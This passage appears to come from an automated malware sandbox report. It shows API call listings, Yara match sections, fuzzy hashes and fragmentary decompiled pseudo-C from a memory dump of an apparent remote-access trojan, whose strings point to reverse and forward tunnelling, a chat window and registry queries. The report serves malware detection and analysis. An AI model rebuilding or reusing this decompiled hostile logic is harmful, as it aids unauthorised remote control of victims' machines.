                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • inet_ntoa.WS2_32 ref: 0040A41B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A42E
                                  • atoi.MSVCRT ref: 0040A435
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A472
                                  • atoi.MSVCRT ref: 0040A479
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040A4A6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A544
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00415B18), ref: 0040A56E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0041B310,00415B18), ref: 0040A578
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00415908), ref: 0040A5AB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0041B310,00415908), ref: 0040A5B5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000085,?,?,?,?,0041B310,00415908), ref: 0040A5CC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00415908), ref: 0040A5DD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00415908), ref: 0040A5E6
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@V01@@$?c_str@?$basic_string@D@2@@0@Hstd@@V?$basic_string@$?length@?$basic_string@V12@$?substr@?$basic_string@V10@V10@0@atoi$??4?$basic_string@?find@?$basic_string@D@1@@EventV01@inet_ntoa
                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                  • API String ID: 4095635200-168337528
                                  • Opcode ID: f3929fae1f8e497e51fb93d2ade4ea54b572ef24a6e630ee0c1868d71aa5104e
                                  • Instruction ID: b25c6e2405df25c2c81854c085642773db686a1d66d7f735eb38a539f85e00a7
                                  • Opcode Fuzzy Hash: f3929fae1f8e497e51fb93d2ade4ea54b572ef24a6e630ee0c1868d71aa5104e
                                  • Instruction Fuzzy Hash: 3C61A371900309ABDB08BBB1EC4A9EE3B78FB54305F00853AF512A31E1EB78555487AE
                                  Uniqueness Score: -1.00%
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 00402291
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6B015DF0), ref: 00402302
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00402363
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040236D
                                  • CreateThread.KERNEL32(00000000,00000000,?,0041BE70,00000000,00000000), ref: 0040237E
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402389
                                  • CloseHandle.KERNEL32(00000000), ref: 00402392
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0040D2B5,6B015DF0), ref: 004023A7
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023B1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023BA
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023C3
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023E3
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??4?$basic_string@V01@$??1?$basic_string@$?length@?$basic_string@?substr@?$basic_string@V12@$??0?$basic_string@??9std@@CreateD@2@@0@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?size@?$basic_string@CloseD@1@@EventHandleObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 3745950881-0
                                  • Opcode ID: 44daeea15bb855e80108764f54982e8e04786625b5849f173a8cb93a7b3b47fc
                                  • Instruction ID: 9121e1d36d2ed1e5780a03bc3f6ba97c1b97061ac4fd9a6be39e0f6b7c1c719d
                                  • Opcode Fuzzy Hash: 44daeea15bb855e80108764f54982e8e04786625b5849f173a8cb93a7b3b47fc
                                  • Instruction Fuzzy Hash: 0451FD7250060EEFCB049FA0DD88CEEBB78FF84355B00806AF916A71A0DB745985CB58
                                  Uniqueness Score: -1.00%
                                  C-Code - Quality: 34%
                                  			E0040295E(void* __eflags, intOrPtr _a4, char _a7) {
                                  				char _v5;
                                  				void* _v12;
                                  				char _v28;
                                  				void* _v44;
                                  				char _v60;
                                  				char _v76;
                                  				char _v92;
                                  				struct tagMSG _v120;
                                  				int _t29;
                                  				void* _t35;
                                  				intOrPtr _t41;
                                  				void* _t45;
                                  				void* _t50;
                                  				void* _t51;
                                  				void* _t62;
                                  				void* _t63;
                                  				intOrPtr _t95;
                                  				void* _t97;
                                  				void* _t101;
                                  				void* _t104;
                                  				void* _t105;
                                  				void* _t107;
                                  
                                  				_t107 = __eflags;
                                  				_t95 = _a4;
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t95 + 0x18);
                                  				_t29 = SetEvent( *(_t95 + 0x28));
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				E004129EB(_t107,  &_v28,  &_v76, 0x41b310,  &_v76, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                  				_t104 = _t101 + 0x24;
                                  				_t97 =  *_t29 - 0x3a;
                                  				if(_t97 == 0) {
                                  					_t35 = E0040180C( &_v28, __eflags, 0);
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					_t62 = E00406DD9(_t35);
                                  					__eflags = _t62;
                                  					if(_t62 == 0) {
                                  						L12:
                                  						E004017DD( &_v28);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						__eflags = 0;
                                  						return 0;
                                  					}
                                  					 *0x41b794 = E00407033(_t62, "DisplayMessage");
                                  					 *0x41b798 = E00407033(_t62, "GetMessage");
                                  					_t41 = E00407033(_t62, "CloseChat");
                                  					_t105 = _t104 + 8;
                                  					 *0x41b79c = _t41;
                                  					 *0x41b790 = 1;
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  					E004020C2(_t95, 0x74, 0x41b738);
                                  					L10:
                                  					_t63 = HeapCreate(0, 0, 0);
                                  					_t45 =  *0x41b798(_t63,  &_v12);
                                  					__eflags = _t45;
                                  					if(_t45 != 0) {
                                  						_t105 = _t105 - 0x10;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t45,  &_v5);
                                  						E004020C2(_t95, 0x3b, _v12);
                                  						HeapFree(_t63, 0, _v12);
                                  					}
                                  					goto L10;
                                  				}
                                  				_t109 = _t97 != 1;
                                  				if(_t97 != 1) {
                                  					goto L12;
                                  				}
                                  				_t50 = E00412881( &_v92);
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_v92, E0040180C( &_v28, _t109, 0));
                                  				_t51 =  *0x41b794(_t50);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				if(_t51 == 0) {
                                  					goto L12;
                                  				}
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_a7);
                                  				E00412855( &_v60, _t104 - 0x10,  &_v60);
                                  				E004020C2(_t95, 0x3b, 0x41576c);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				L4:
                                  				while(GetMessageA( &_v120, 0, 0, 0) <= 0) {
                                  					if(__eflags >= 0) {
                                  						goto L12;
                                  					}
                                  				}
                                  				TranslateMessage( &_v120);
                                  				DispatchMessageA( &_v120);
                                  				goto L4;
			}

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402971
                                  • SetEvent.KERNEL32(?), ref: 0040297A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402983
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 0040299B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 004029AB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004029BA
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004029F5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402A08
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041576C,?), ref: 00402A22
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000003B), ref: 00402A45
                                  • GetMessageA.USER32 ref: 00402A52
                                  • TranslateMessage.USER32(?), ref: 00402A60
                                  • DispatchMessageA.USER32 ref: 00402A6A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402A87
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B738,00000000,DisplayMessage), ref: 00402ADF
                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00402AF1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00402B17
                                  • HeapFree.KERNEL32(00000000,00000000,?,0000003B), ref: 00402B2B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B3E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B47
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$V01@@$?c_str@?$basic_string@?length@?$basic_string@$D@1@@MessageV12@$?substr@?$basic_string@G@1@@Heap$??2@??3@??4?$basic_string@?find@?$basic_string@CreateDispatchEventFreeTranslateV01@
                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                  • API String ID: 1701728818-749203953
                                  • Opcode ID: 78cabc971eb8825b31cfd8cf90bdfcb476906dc19c985b55c530726c243df69e
                                  • Instruction ID: 706d1787dbe5d31282a01ee588047493408fae45c62342a208237384888500fd
                                  • Opcode Fuzzy Hash: 78cabc971eb8825b31cfd8cf90bdfcb476906dc19c985b55c530726c243df69e
                                  • Instruction Fuzzy Hash: 75517F72A00608EBCB14ABE1ED4D9EE7B7CEF84355B10403AF502E31D1DBB85545CBA8
Uniqueness
Uniqueness Score: -1.00%
                                  C-Code - Quality: 34%
                                  			E0040BE34(char _a4, short* _a20, intOrPtr _a24, char _a27) {
                                  				void* _v8;
                                  				char _v24;
                                  				char _v40;
                                  				char _v56;
                                  				char _v72;
                                  				char _v88;
                                  				char _v104;
                                  				char _v120;
                                  				char _v136;
                                  				char _v152;
                                  				void* _t28;
                                  				long _t29;
                                  				void* _t35;
                                  				char* _t38;
                                  				char* _t39;
                                  				char* _t40;
                                  				char* _t41;
                                  				char* _t42;
                                  				char* _t43;
                                  				char* _t44;
                                  				void* _t54;
                                  				void* _t56;
                                  				char* _t73;
                                  				void* _t77;
                                  				void* _t79;
                                  
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				_t28 = E0040BD9B( &_a4);
                                  				_t79 = _t77 - 0x10 + 0x10;
                                  				_t47 = 0;
                                  				_t29 = RegOpenKeyExW(_t28, _a20, 0, 0x20019,  &_v8);
                                  				_t90 = _t29;
                                  				if(_t29 != 0) {
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                  					E004020C2(0x41bde0, 0x72, "3");
                                  				} else {
                                  					E0040BB20( &_v8, _t90, _v8);
                                  					_pop(_t54);
                                  					_t73 = "0";
                                  					if(_a24 != 0) {
                                  						_t73 = "1";
                                  					}
                                  					_t35 = E00412855(_t54,  &_v152, 0x41bdd0);
                                  					_t56 = 0x41b310;
                                  					_t38 =  &_v88;
                                  					L00414176();
                                  					_t39 =  &_v56;
                                  					L00414140();
                                  					_t40 =  &_v40;
                                  					L00414140();
                                  					_t41 =  &_v24;
                                  					L00414140();
                                  					_t42 =  &_v72;
                                  					L00414140();
                                  					_t43 =  &_v104;
                                  					L00414140();
                                  					_t44 =  &_v136;
                                  					L00414140();
                                  					L00414140();
                                  					E004020C2(0x41bde0, 0x71, _t79 - 0x10);
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t44, _t44, _t43, _t43, _t42, _t42, _t41, _t41, _t40, _t40, _t39, _t39, _t38, _t38, _t73, 0x41b310, E00412855(_t56,  &_v120, 0x41be40), 0x41b310, _t35, 0x41be30, 0x41b310, 0x41be50);
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
                                  					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
                                  					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
                                  					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
                                  					RegCloseKey(_v8);
                                  					_t47 = 1;
                                  				}
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return _t47;
			}

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,00000004), ref: 0040BE49
                                    • Part of subcall function 0040BD9B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                    • Part of subcall function 0040BD9B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                  • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,0040C731), ref: 0040BE67
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00415B14,0041B310,00000000,0041B310,00000000,0041B310,0041BE30,0041B310,0041BE50), ref: 0040BECF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041BE30,0041B310,0041BE50), ref: 0040BEDC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,0041BE50), ref: 0040BEE9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BEF6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BF03
